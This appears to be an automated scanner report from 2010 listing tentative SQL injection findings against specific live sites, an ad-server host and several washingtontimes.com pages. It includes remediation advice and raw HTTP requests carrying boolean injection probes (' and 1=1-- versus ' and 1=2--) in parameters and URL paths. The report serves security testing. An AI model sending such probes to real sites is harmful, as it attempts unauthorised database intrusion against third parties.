SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The esi parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the esi parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Mon, 13 Dec 2010 21:23:28 GMT
Connection: close
Cache-Control: no-store
Content-Length: 19553
var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D ...[SNIP]...
1.2. http://core.insightexpressai.com/adServer/GetInvite2.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://core.insightexpressai.com
Path: /adServer/GetInvite2.aspx
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Mon, 13 Dec 2010 21:23:56 GMT
Connection: close
Cache-Control: no-store
Content-Length: 19569
var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D ...[SNIP]...
The referer parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the referer parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Mon, 13 Dec 2010 21:23:35 GMT
Connection: close
Cache-Control: no-store
Content-Length: 19555
var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D ...[SNIP]...
1.4. http://www.washingtontimes.com/&hl=en&client=ca-pub-0717469368406276&adU=www.Savane.com&adT=ImageAd&gl=US&usg=AFQjCNG2mzGkVn39su6Gqdxg4HBmSuFMZA/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /&hl=en&client=ca-pub-0717469368406276&adU=www.Savane.com&adT=ImageAd&gl=US&usg=AFQjCNG2mzGkVn39su6Gqdxg4HBmSuFMZA/?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 15160
Date: Mon, 13 Dec 2010 21:21:59 GMT
X-Varnish: 570568454
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... <img src="http://media.washtimes.com/media/img/staff/2010/HILL_PATRICE_CUTOUT_s46x70.jpg?64979ce23d147b6fd352d13fee19baf12506ed31" width="46" height="70" alt="Patrice Hill" class="left right mt ml" /><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/us-free-traders-sour-on-china/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">Trade tensions between the United States and China have broken out into open verbal warfare.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/patrice-hill/">Patrice Hill</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li id="menu_opinion"><a href="/opinion/" title="Opinion">Opinion</a></li><li id="menu_sports"><a href="/sports/" title="Sports">Sports</a></li><li id="menu_culture"><a href="/culture/" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li id="menu_multimedia"><a href="/multimedia/" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" 
value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml"/></div></form><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></scri ...[SNIP]...
Request 2
GET /&hl=en&client=ca-pub-0717469368406276&adU=www.Savane.com&adT=ImageAd&gl=US&usg=AFQjCNG2mzGkVn39su6Gqdxg4HBmSuFMZA/?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 15190
Date: Mon, 13 Dec 2010 21:21:59 GMT
X-Varnish: 570568468
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... <img src="http://media.washtimes.com/media/img/staff/2010/LENGELL_SEAN_CUTOUT_s48x70.jpg?248150494911055c9c22ceea125bb17612a1ba43" width="48" height="70" alt="Sean Lengell" class="left right mt ml" /><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/house-financial-panel-to-see-a-new-style/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">Spencer Bachus said one of his key priorities is to revamp, if not undo, much of Obama's financial reforms.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/sean-lengell/">Sean Lengell</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li id="menu_opinion"><a href="/opinion/" title="Opinion">Opinion</a></li><li id="menu_sports"><a href="/sports/" title="Sports">Sports</a></li><li id="menu_culture"><a href="/culture/" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li id="menu_multimedia"><a href="/multimedia/" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" 
name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml"/></div></form><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form= ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /culture'%20and%201%3d1--%20/gift-guide/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14738
Date: Mon, 13 Dec 2010 21:34:36 GMT
X-Varnish: 570585415
Age: 0
Via: 1.1 varnish
Connection: close
Request 2
GET /culture'%20and%201%3d2--%20/gift-guide/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14714
Date: Mon, 13 Dec 2010 21:34:37 GMT
X-Varnish: 570585632
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... <img src="http://media.washtimes.com/media/img/staff/2010/HILL_PATRICE_CUTOUT_s46x70.jpg?64979ce23d147b6fd352d13fee19baf12506ed31" width="46" height="70" alt="Patrice Hill" class="left right mt ml" /><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/us-free-traders-sour-on-china/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">Trade tensions between the United States and China have broken out into open verbal warfare.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/patrice-hill/">Patrice Hill</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li id="menu_opinion"><a href="/opinion/" title="Opinion">Opinion</a></li><li id="menu_sports"><a href="/sports/" title="Sports">Sports</a></li><li class="active blue" id="menu_culture"><a href="/culture/" class="active" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li id="menu_multimedia"><a href="/multimedia/" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input 
type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml"/></div></form><script type="text/javascript" src="http://www.google.com/coop/cse/brand? ...[SNIP]...
1.6. http://www.washingtontimes.com/culture/gift-guide/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.washingtontimes.com
Path: /culture/gift-guide/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /culture/gift-guide/?1%20and%201%3d1--%20=1 HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 42707
Date: Mon, 13 Dec 2010 21:33:14 GMT
X-Varnish: 570583642
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>Holiday Gi ...[SNIP]... <blockquote class="c400 right pullquote"><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/pakistani-forces-hamper-embassy/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">Pakistan's military and intelligence service took the action of going to war against the U.S. Embassy in Islamabad.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/rowan-scarborough/">Rowan Scarborough</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li id="menu_opinion"><a href="/opinion/" title="Opinion">Opinion</a></li><li id="menu_sports"><a href="/sports/" title="Sports">Sports</a></li><li class="active blue" id="menu_culture"><a href="/culture/" class="active" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li id="menu_multimedia"><a href="/multimedia/" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" 
size="20" /><input type="submit" name="sa" value="Search" class="ml"/></div></form><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script></div></li></ul><ul class="full nav secondary dnone hover" id="su ...[SNIP]...
Request 2
GET /culture/gift-guide/?1%20and%201%3d2--%20=1 HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 42868
Date: Mon, 13 Dec 2010 21:33:15 GMT
X-Varnish: 570583683
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>Holiday Gi ...[SNIP]... <blockquote class="c400 right pullquote"><img src="http://media.washtimes.com/media/img/staff/2010/HILL_PATRICE_CUTOUT_s46x70.jpg?64979ce23d147b6fd352d13fee19baf12506ed31" width="46" height="70" alt="Patrice Hill" class="left right mt ml" /><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/us-free-traders-sour-on-china/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">Trade tensions between the United States and China have broken out into open verbal warfare.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/patrice-hill/">Patrice Hill</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li id="menu_opinion"><a href="/opinion/" title="Opinion">Opinion</a></li><li id="menu_sports"><a href="/sports/" title="Sports">Sports</a></li><li class="active blue" id="menu_culture"><a href="/culture/" class="active" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li id="menu_multimedia"><a href="/multimedia/" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" 
value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml"/></div></form><script type="t ...[SNIP]...
1.7. http://www.washingtontimes.com/culture/travel/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.washingtontimes.com
Path: /culture/travel/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /culture/travel/?1%20and%201%3d1--%20=1 HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 45663
Date: Mon, 13 Dec 2010 21:32:16 GMT
X-Varnish: 570582153
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>Washington ...[SNIP]... <blockquote class="c400 right pullquote"><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/pakistani-forces-hamper-embassy/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">Pakistan's military and intelligence service took the action of going to war against the U.S. Embassy in Islamabad.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/rowan-scarborough/">Rowan Scarborough</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li id="menu_opinion"><a href="/opinion/" title="Opinion">Opinion</a></li><li id="menu_sports"><a href="/sports/" title="Sports">Sports</a></li><li class="active blue" id="menu_culture"><a href="/culture/" class="active" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li id="menu_multimedia"><a href="/multimedia/" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" 
size="20" /><input type="submit" name="sa" value="Search" class="ml"/></div></form><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script></div></li></ul><ul class="full nav secondary dnone hover" id="su ...[SNIP]...
Request 2
GET /culture/travel/?1%20and%201%3d2--%20=1 HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 45848
Date: Mon, 13 Dec 2010 21:32:18 GMT
X-Varnish: 570582406
Age: 0
Via: 1.1 varnish
Connection: close
1.8. http://www.washingtontimes.com/multimedia/collection/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.washingtontimes.com
Path: /multimedia/collection/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 20254755%20or%201%3d1--%20 and 20254755%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /multimedia/collection/?120254755%20or%201%3d1--%20=1 HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 24116
Date: Mon, 13 Dec 2010 21:33:35 GMT
X-Varnish: 570583901
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>
Multi ...[SNIP]... <blockquote class="c400 right pullquote"><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/pakistani-forces-hamper-embassy/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">Pakistan's military and intelligence service took the action of going to war against the U.S. Embassy in Islamabad.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/rowan-scarborough/">Rowan Scarborough</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li id="menu_opinion"><a href="/opinion/" title="Opinion">Opinion</a></li><li id="menu_sports"><a href="/sports/" title="Sports">Sports</a></li><li id="menu_culture"><a href="/culture/" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li class="active blue" id="menu_multimedia"><a href="/multimedia/" class="active" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml"/></div></form><script type="text/javascript" 
src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script></div></li></ul><ul class="full nav secondary dnone hover" id="su ...[SNIP]...
Request 2
GET /multimedia/collection/?120254755%20or%201%3d2--%20=1 HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 24277
Date: Mon, 13 Dec 2010 21:33:36 GMT
X-Varnish: 570584146
Age: 0
Via: 1.1 varnish
Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /multimedia'%20and%201%3d1--%20/collection/30th-anniversary-john-lennons-murder/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14554
Date: Mon, 13 Dec 2010 21:37:30 GMT
X-Varnish: 570589802
Age: 0
Via: 1.1 varnish
Connection: close
Request 2
GET /multimedia'%20and%201%3d2--%20/collection/30th-anniversary-john-lennons-murder/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14759
Date: Mon, 13 Dec 2010 21:37:38 GMT
X-Varnish: 570590026
Age: 0
Via: 1.1 varnish
Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /multimedia/collection/child-hostages-freed-france'%20and%201%3d1--%20/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14561
Date: Mon, 13 Dec 2010 21:38:57 GMT
X-Varnish: 570592245
Age: 0
Via: 1.1 varnish
Connection: close
Request 2
GET /multimedia/collection/child-hostages-freed-france'%20and%201%3d2--%20/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
